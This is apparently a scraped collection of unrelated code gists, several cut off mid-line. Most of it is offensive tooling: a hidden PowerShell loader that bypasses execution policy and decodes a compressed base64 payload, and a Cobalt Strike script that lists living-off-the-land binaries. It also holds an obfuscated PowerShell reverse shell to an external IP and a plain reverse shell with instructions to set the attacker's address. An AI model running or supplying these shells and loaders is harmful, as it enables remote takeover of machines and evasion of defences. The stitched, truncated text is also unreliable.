This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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 |
@lolbins = @("Atbroker.exe","Bash.exe","Bitsadmin.exe","Cmstp.exe","Diskshadow.exe","Dnscmd.exe","Extexport.exe","Forfiles.exe","Gpscript.exe","Hh.exe","Ie4unit.exe","Ieexec.exe","Infdefaultinstall.exe","Installutil.exe","Mavinject.exe","Microsoft.Workflow.Compiler.exe","Msbuild.exe","Msconfig.exe","Msdt.exe","Mshta.exe","Msiexec.exe","Odbcconf.exe","Pcalua.exe","Pcwrun.exe","Presentationhost.exe","Regasm.exe","Register-cimprovider.exe","Regsvcs.exe","Regsvr32.exe","Rundll32.exe","Runonce.exe","Runscripthelper.exe","Schtasks.exe","Scriptrunner.exe","SyncAppvPublishingServer.exe","Wab.exe","Wmic.exe","Xwizard.exe");
beacon_command_register("lolbin", "Queries the System for all major lolbin products installed",
"Syntax: lolbin\n" .
"Checks for installed lolbin products");
alias lolbin {
$bid = $1;
$function = $2;
import requests
import json
from docx import Document
A_KEY = ""
S_KEY = ""
headers = {"X-ApiKeys": "accessKey=; secretKey="}
BASE_URL = "https://localhost:8834"
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from time import sleep
options = Options()
#options.add_argument("--headless")
driver = webdriver.Chrome(chrome_options=options,executable_path="chromedriver")
user_pass = "" # space separated
<?XML version="1.0"?>
<scriptlet>
<registration remotable="True" version="1.0" desription="desription">
<script language="VBScript">
<![CDATA[
Msgbox("Message")
]]>
&('Sv') ("{0}{1}"-f 'Lh','aW3') ( [TypE]("{3}{1}{0}{2}" -F 'ENcOdI','ExT.','ng','T') ); ${CLi`E`NT} = &("{1}{0}{2}"-f '-Obje','New','ct') ("{0}{2}{1}{3}{4}"-f'System.Ne','s.T','t.Socket','CPCli','ent')(("{2}{0}{1}"-f '4.194','.214.53','5'),443);${str`E`AM} = ${Cl`i`EnT}.("{0}{2}{1}" -f'GetSt','m','rea').Invoke();[byte[]]${B`yTEs} = 0..65535|&('%'){0};while((${i} = ${sTr`eaM}.("{1}{0}"-f 'd','Rea').Invoke(${B`yT`eS}, 0, ${b`yt`eS}."le`NgTh")) -ne 0){;${d`Ata} = (.("{1}{0}{2}" -f 'ew-Obj','N','ect') -TypeName ("{5}{2}{4}{3}{0}{1}"-f'IEnco','ding','ystem.Text.','SCI','A','S')).("{1}{0}{3}{2}" -f'e','G','ing','tStr').Invoke(${b`y`TES},0, ${I});${Se`Nd`BAcK} = (.("{1}{0}"-f'x','ie') ${d`ATa} 2>&1 | &("{2}{0}{1}"-f'S','tring','Out-') );${sE`NDBAc`K2} = ${S`END`BacK} + "PS " + (&("{1}{0}"-f'wd','p'))."p`AtH" + "> ";${sE`N`DbyTE} = ( ( .('LS') ("{2}{1}{3}{0}{4}"-f 'ble:L','i','var','a','HAW3') )."v`ALuE"::"A`Scii").("{0}{1}"-f 'Get','Bytes').Invoke(${SEndb`A`c`k2});${sTRe`Am}.("{0}{1}"-f 'W','rite').Invoke($ |
#A simple and small reverse shell. Options and help removed to save space.
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.126",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
#$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
vjTNELvUZXQAAAAAAAAClyVJtWzyZP1GJDNuHYs_9-MS182GzoVSkvYFYmH2-lOI |